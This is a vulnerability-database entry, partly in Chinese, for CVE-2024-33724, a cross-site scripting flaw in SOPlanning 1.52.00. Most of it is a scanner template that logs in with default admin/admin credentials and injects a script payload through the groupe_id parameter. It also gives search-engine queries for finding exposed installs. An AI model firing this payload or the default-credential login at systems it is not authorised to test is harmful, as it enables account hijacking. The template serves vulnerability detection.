CVE-2024-33724: SOPlanning 1.52.00 Cross Site Scripting

日期: 2025-08-01 | 影响软件: SOPlanning | POC: 已公开

漏洞描述

SOPlanning v1.52.00 is vulnerable to XSS via the 'groupe_id' parameters a remote unautheticated attacker can hijack the admin account or other users. The remote attacker can hijack a users session or credentials and perform a takeover of the entire platform.

PoC代码[已公开]

id: CVE-2024-33724

info:
  name: SOPlanning 1.52.00 Cross Site Scripting
  author: s4e-io
  severity: medium
  description: |
    SOPlanning v1.52.00 is vulnerable to XSS via the 'groupe_id' parameters a remote unautheticated attacker can hijack the admin account or other users. The remote attacker can hijack a users session or credentials and perform a takeover of the entire platform.
  reference:
    - https://packetstormsecurity.com/files/178434/SOPlanning-1.52.00-Cross-Site-Scripting.html
    - https://github.com/fuzzlove/soplanning-1.52-exploits
  metadata:
    verified: true
    max-request: 2
    vendor: soplanning
    product: soplanning
    shodan-query:
      - html:"soplanning"
      - http.html:"soplanning"
    fofa-query: body="soplanning"
  tags: packetstorm,cve,cve2024,authenticated,soplanning,xss,vuln

http:
  - raw:
      - |
        POST /process/login.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        login={{username}}&password={{password}}

      - |
        GET /process/groupe_save.php?saved=1&groupe_id=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E%3C!--&nom=Project+New HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

    attack: pitchfork

    payloads:
      username:
        - admin
      password:
        - admin

    host-redirects: true
    matchers:
      - type: dsl
        dsl:
          - "status_code_2 == 200"
          - 'contains_all(body_2, "<script>alert(document.domain)</script>", "SOPlanning")'
        condition: and
# digest: 4a0a0047304502201ab35403d246f0f2eca519425a8f8b7cde9d17d4fe2fde491cc1ffd54a41f33b022100929fb0833cab14d4094d053dbab14644d8238ac3334313522b092f3a5ff6df0c:922c64590222798bb761d5b6d8e72950

相关漏洞推荐